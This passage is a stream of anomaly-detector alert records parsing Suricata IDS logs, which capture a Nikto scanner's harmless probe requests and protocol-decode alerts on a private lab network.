(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.c\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.c\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.c", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.c", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": 
"\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46788, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1561375214838397,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1561375214838397, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.173752+0000\",\"flow_id\":1561375214838397,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.175341 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46790 -> 192.168.10.154:80", "/parser/model/time": 1583349514.175341, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46790, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.175341 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by 
non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46790 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.2", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.175637+0000\",\"flow_id\":1984927709702721,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.175637, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1984927709702721,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 
"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.2\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", 
"/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.2\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.2", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.2", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", 
"/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46790, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1984927709702721,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1984927709702721, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.175637+0000\",\"flow_id\":1984927709702721,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.178599 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46792 -> 192.168.10.154:80", "/parser/model/time": 1583349514.178599, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46792, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.178599 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46792 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.jsa", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.178847+0000\",\"flow_id\":279331771953661,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.178847, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":279331771953661,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.jsa\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.jsa\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.jsa", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.jsa", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46792, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":279331771953661,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 279331771953661, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.178847+0000\",\"flow_id\":279331771953661,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.180234 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46794 -> 192.168.10.154:80", "/parser/model/time": 1583349514.180234, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46794, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.180234 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46794 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.org", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 